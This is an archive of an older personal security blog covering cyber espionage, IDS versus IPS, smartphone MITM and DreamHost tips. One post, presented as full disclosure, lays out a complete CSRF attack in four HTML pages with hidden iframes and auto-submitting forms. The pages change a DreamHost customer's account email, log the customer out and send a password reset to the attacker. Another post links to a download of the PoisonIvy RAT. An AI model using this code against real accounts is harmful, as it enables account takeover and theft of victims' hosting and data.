Security Related

Guy Mizrahi about Security and Technology.
Subscribe

What is Cyber?

April 24, 2011 By: Guy Mizrahi Category: Cyber

Cyber Espionage.

In the last couple of years there is a new word in the military forces all over the world. The new word is “Cyber”.

It comes in some flavors: Cyber Warfare, Cyber Terror, Cyber Crime and last but not least: Cyber Espionage.

It is very hard to classify each one of those but I’ll try to do this anyways in my next blog posts. I’ll start with cyber espionage.

What is Cyber Espionage?

The easy stuff to explain is Cyber Espionage. This stand for any type of espionage that operates on the Internet. Think about Trojan Horses or RATs (Remote Access Tools). There are a lot of those tools that are distributed freely on the Internet and it is very easy to take one and use it for any army’s espionage need.

RAT can fetch files, computer and OS details, spy on user’s activities and even turn your computer to listening device by capturing audio from your mic and video from your webcam. The perfect tool for espionage.

A RAT that I use regularly for my demo’s on lectures I give is PoisonIvy. You can get it freely on it’s site (http://poisonivy-rat.com).

PoisonIvy is a good example for espoinage trojan (aka RAT). It’s control panel look like this:

PoisonIvy Control Panel

When You click on the mark’s computer (that is already infected and connected) you get this panel:

Mark's computer

As you can see, This is the IT Person’s dream tool. You can trully do anything to the infected computer. From details about the OS, computer and user to registry changes, services manipulation, process manipulation, Keylogging and every other thing you can think about.

This is only one tool of the trade, but as you can see – it  is the cyber spook dream tool. I can easily spy on anyone infected with this tool. Easy and very comprehensive.

This tool was in used for espionage and it was also used in many cyber crime operations.

Every other Cyber operation must begin in a good reconnaissance operation. Good recon relays on good information gathering and it must involve sort of espionage.

IDS or IPS?

June 25, 2010 By: Guy Mizrahi Category: Security, Technology, Uncategorized

Couple of days ago, during a lesson (There is a course in Israel called CISO and I am one of the Instructors) I talked about IDS and IPS systems.

For those of you who are not familiar with the systems:

IDS stands for Intrusion detection System and IPS stands for Intrusion Prevention System.

As you can understand from the name of the devices, they are very close one to each other.

In many cases when I does my consulting work I see an IPS device in an organizations and when I ask why did they choose and IPS system over IDS system there is no answer.

When you try to look closely you can see that the main instruction was to alert when there is an intrusion. There is no need to take action, just to alert so why would you choose an IPS over IDS? when you try to look even closer you can see that this was the recommendation from the previous consultant and no one said otherwise.

Is this a problem? Maybe. I’ll explain..

IPS is a Device that need to interfere with the network traffic. The ability to interfere will allow the attacker to identify that there is an IPS on the network because the attacker can identify the fact that some packets will not do what they was supposed to.

I think that the main problem with IDS is that you know that it is there.

If you do not need an active defense, you should consider an IDS.

It is not present on the network from the attacker point of view.

The monitor port where you can place IDS probe is completly silent and will not allow interference with the traffic.

From the attacker view there is nothing to worry about and from your place you can view all the alerts in your SIEM and instruct the SOC to react.

Another idea is that if the attacker knows about the IPS he can identify it and maybe will have a way to hurt the device itself. a 0-day for IPS.

So why use IPS? because there are places that need to respond when they are under attack. Some people will say it is most of the places.

All I am saying is don’t go to IPS because someone said it is better. You need to consider if you need the functionality of an active system by responding to an attack. If that is the case, IPS will be a good decision but otherwise? You need to think.

btw: I consider IPS that is not in the prevention mode as IDS for this article.

mitm for smartphones

November 18, 2009 By: Guy Mizrahi Category: Uncategorized

I have read this article about Man-in-the-middle attacks demoed on 4 smartphones.

Lets see… are they really saying this?

Can you really hack and manipulate clients of a non secured wifi lan?

It has been discussed a lot of times and demo of this attack is everywhere, so what is new here?

A free public tool (SSLstrip), an unsecured wifi access point and some technical skills can give you the power to hack any client near you.

but what is new  here that deserve an article?

the fact that they attacked a smartphone?

I see no news here.

Smartphones are small computers. you can hack them as easy as you can attack a pc.

(well, maybe it is easyer on the iPhone because you already knows that the root password is alpine 🙂 ).

What need to be said is that:

The knowledge and the way of think of a hacker is not limited to computers, phones or even electornics.

The hacker charm will work on everything: a person will be manipulated using Social Engineering and your credential will be stolen wherever you keep them.

The attack of a hacker is not because of the technology can allow it. It is happening because you allow this.

So? you want to surf without being hacked?

click here to download this and youll be safe (Just kidding! 🙂 ).

E-crime by the Mafia in israel

November 02, 2009 By: Guy Mizrahi Category: Uncategorized

I read the other day a great story that involves Mafia and computer crimes.

The story begins with a manager of IT services in the computers department of the Israeli gambling commission  that criminals tried to push him to install their pre made dedicated software.

This software was supposed to give the criminals the names and details of  the winning “TOTO” prize. The details was supposed to be sent to the criminals as soon as the winners declared and then they can obtain the winning tickets and collect the prizes.

The story does not end there.

A year later they tried a different approach. The criminals built a web site for the same comity that could sent a winning “TOTO Winner” (daily toto gambling game) a half an hour after the end of the gabling time.

This time the Israeli police was informed and started an investigation that led to the Zeev Rosenshtein organization (a big mafia head that is currently serving time in the US jail).

The police wanted to open a new task force of 100 officers to fight this kind of things but the all idea didn’t succeed.

Well.. I thinks that the regualr police can not fight this kind of crime. they need a better researchers to do this kind of investigations.

How many users on dreamhost server?

July 03, 2009 By: Guy Mizrahi Category: Uncategorized

so, you want to find out how many users hosting their site along yours on dreamhost server?
this command will give you the amount of users on the server.
awk -F: ‘$3 > 999 { print $0}’ /etc/passwd | wc -l
each user have at least one site.

I am using luigi.dreamhost.com:
[luigi]$ awk -F: ‘$3 > 999 { print $0}’ /etc/passwd | wc -l
797

there are at least 797 users on luigi and probably a lot more sites.

how to regenerate phpbb_topics

August 20, 2008 By: Guy Mizrahi Category: Tips and Tricks

if phpbb_topics table is corrupted and you need to regenerate it, you can use this script:

<?php
//———————-//
// phpbb_topics    Bappear    //
//———————-//
include “config.php”;
$abc = mysql_connect($dbhost, $dbuser, $dbpasswd);
mysql_select_db($dbname);

$aaa = mysql_query(“SELECT ” . $table_prefix . “posts.topic_id, ” . $table_prefix . “posts.forum_id, ” . $table_prefix . “posts.poster_id, ” . $table_prefix . “posts.post_time, not ISNULL(” . $table_prefix . “vote_desc.topic_id) as vote_topic_id, (count(” . $table_prefix . “posts.post_id) – 1) as topic_replies, IF(ISNULL(” . $table_prefix . “posts_text.post_subject), ‘Generic Title’, ” . $table_prefix . “posts_text.post_subject) as post_subject, ” . $table_prefix . “posts_text.post_id as topic_first_post_id, max(” . $table_prefix . “posts_text.post_id) as topic_last_post_id FROM `” . $table_prefix . “posts` LEFT JOIN ” . $table_prefix . “vote_desc ON ” . $table_prefix . “posts.topic_id = ” . $table_prefix . “vote_desc.topic_id LEFT JOIN ” . $table_prefix . “posts_text ON ” . $table_prefix . “posts.post_id = ” . $table_prefix . “posts_text.post_id GROUP BY ” . $table_prefix . “posts.topic_id;”, $abc);

while($data = mysql_fetch_array($aaa)) {

mysql_query(“INSERT INTO `” . $table_prefix . “topics` (`topic_id`, `forum_id`, `topic_title`, `topic_poster`, `topic_time`, `topic_views`, `topic_replies`, `topic_status`, `topic_vote`, `topic_type`, `topic_first_post_id`, `topic_last_post_id`, `topic_moved_id`) VALUES(” . $data[‘topic_id’] . “, ” . $data[‘forum_id’] . “, ‘” . mysql_real_escape_string($data[‘post_subject’]) . “‘, ” . $data[‘poster_id’] . “, ” . $data[‘post_time’] . “, 0, ” . $data[‘topic_replies’] . “, 0, ” . $data[‘vote_topic_id’] . “, 0, ” . $data[‘topic_first_post_id’] . “, ” . $data[‘topic_last_post_id’] . “, 0);”);
}

mysql_free_result($aaa);
mysql_close($abc);
?>

this script was created by one of my forums member, Nachum.

Thanks – It was a real save.

How to Steal DreamHost accounts?

June 14, 2008 By: Guy Mizrahi Category: Hacking, Security

I thought a lot before posting this, but in the name of full disclosures..

This is the second time someone is trying to do that against my dreamhost account so I guess that it need to be public.

It will work on any dreamhost costumer that logged in to his account (Note – you must use the logout button and then it will not work on your account 🙂 ).

A legal notice – If you use this to hack into someone’s account you probably know that it is illegal and I have nothing to do with it. This disclosure is for learning purpose and to make dreamhost fix it asap..

A short manual – how to steal dreamhost accounts (I guess that it can be used to steal any account that use same defective security mechanism).

So – How?

It is done by sending a link to a page you need to create and host online.

There will be 4 web pages to do 3 stages of attack:

1. Automatic change of contact details in the dreamhost control panel from your mark’s details to something you can get access to (the most important is the e-mail address).

2. automatic logoff your mark from dreamhost’s control panel.

3. request a new password to the new e-mail from dreamhost.

The first page (lets call it start.php):

   1:  <html>
   2:  <META content="text/html; charset=iso-8859-8-i" http-equiv=Content-Type>
   3:  <a1>This page can not be found</a1>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info.php" scrolling="no" frameborder="0"></iframe>
   5:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
   6:  </iframe>
   7:  </html>

as you can see, this page is loading two iframes with 0.1% height and width so the mark can’t see it.

info.php:

   1:  <html>
   2:  <body>
   3:  <form method=post action="https://panel.dreamhost.com/id/?" id="2" name="asd">
   4:  <input type=hidden name=tab value="contact">
   5:  <input type=hidden name="command" value="submit_edit">
   6:      <tr valign=top>
   7:          <td id=txt align=right><b>Name:</b></td>
   8:          <td><select name="prefix" id=frm>
   9:                  <option value=""></option>
  10:                  </select>
  11:                  <input name="first" value="somename" size="8" id=frm>
  12:                  <input name="middle" size="1" id=frm>
  13:                  <input name="last" value="somefamily" size="8" id=frm>
  14:                  <select name="suffix" id=frm>
  15:                  <option value=""></option>
  16:                  </select>
  17:          </td>
  18:      </tr>
  19:      <tr valign=top>
  20:  
  21:          <td id=txt align=right><b>Address:</b></td>
  22:          <td><input name="street1" value="somestreet" size=30 id=frm><br>
  23:                  <input name="street2" size=30 id=frm><br>
  24:                  <input name="city" value="somecity"  size=20 id=frm>, <input name="state" size=2 id=frm> <input name="zip" value="1324" size=8 id=frm><br><select name="country" id=frm><option value="US">United States</option>
  25:  </select>
  26:          </td>
  27:      </tr>
  28:      <tr valign=top>
  29:          <td id=txt align=right><b>Email:</b></td>
  30:          <td><input name="email" value="somemail@somedomain.com" size=30 id=frm></td>
  31:      </tr>
  32:      <tr>
  33:          <td id=txt align=right><b>Phone:</b></td>
  34:          <td><input name="phone" value="+123.45.6789123" size=30 id=frm></td>
  35:      </tr>
  36:      <tr>
  37:          <td id=txt align=right><b>Fax:</b>*</td>
  38:          <td><input name="fax" size=30 id=frm></td>
  39:      </tr>
  40:      <tr>
  41:          <td id=txt align=right><b>IM:</b>*</td>
  42:          <td><input name="chat" size=30 id=frm></td>
  43:      </tr>
  44:      <tr>
  45:          <td id=txt align=right><b>URL:</b>*</td>
  46:          <td><input name="url" size=30 id=frm></td>
  47:      </tr>
  48:      <tr>
  49:          <td></td>
  50:          <td id=txt>*optional information</td>
  51:      </tr>
  52:      <tr>
  53:          <td colspan=2 align=center id=txt><input type=submit value="Submit New Contact Info" id=frm><br>or<br></td>
  54:      </tr>
  55:  </form>
  56:  <script>
  57:  document.asd.submit();
  58:  </script>
  59:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info3.php" scrolling="no" frameborder="0">
  60:  </body>
  61:  <html>

as you can see – this page will change the mark’s dreamhost control panel details to whatever you want and then redirect to info3.php

info3.php:

   1:  <html>
   2:  <iframe height="0.1%" width="0.1%" src="https://panel.dreamhost.com/index.cgi?Nscmd=Nlogout" scrolling="no" frameborder="0">
   3:  </iframe>
   4:  <iframe height="0.1%" width="0.1%" src="http://somedomain.com/info2.html" scrolling="no" frameborder="0"></iframe>
   5:  </html>

as you can see – info3.php is doing two things:

1. logoff your mark from dreamhost control panel

2. redirect to info2.html

info2.html:

   1:  <html>
   2:  <body onload="document.getElementById('2').submit()">
   3:  <form method="post" class="fancyform" action="https://panel.dreamhost.com/login/forgot.cgi" id="2">
   4:  <input type="hidden" name="return_url" value="" />
   5:  <input type="hidden" name="email_pwd_submitted" value="1" />
   6:  <input name="email" class="text" value="somemail@somedomain.com">
   7:  <input type="submit" class="button" value="Email me my password!">
   8:  </form>
   9:  </body>
  10:  </html>

this last step is to send a forget password notice to the new email address.

that’s it – 4 pages and you can get any dreamhost account..

Some of the best security related feeds

June 09, 2008 By: Guy Mizrahi Category: Uncategorized

I have created an agregator that has most of the security rss feeds that i read.

I think most of you will find it intresting.

Lett me know if you think something is missing 🙂

http://securityfeed.info/

Isn’t it cool to see e-mule working like this ?

May 02, 2008 By: Guy Mizrahi Category: Uncategorized

emule

The best discount for Dreamhost hosting plans.

April 16, 2008 By: Guy Mizrahi Category: Uncategorized

Dreamhost is one of the most hated hosting company.

I use their services for more than 6 months now.

In the first weeks – I was suffering from sluggish connection, low speed and more problems.

In the past 3 or 4 month I am very happy with their servers and connection. Look like they solved many of their problems.

If you need a hosting service and you don’t want to be bothered with space, bandwith and domains restrictions – you can check their hosting.

If you want Dreamhost hosting with the best discount – I created a kickass coupon for it:

You’ll get 50$ discount and a free IP! It is the best deal you can get from them 🙂

If you want it – just enter KICKASS as the Promo Code.

What you’ll get (beside the discount and the free IP)?


Bad Behavior has blocked 81 access attempts in the last 7 days.

FireStats icon Powered by FireStats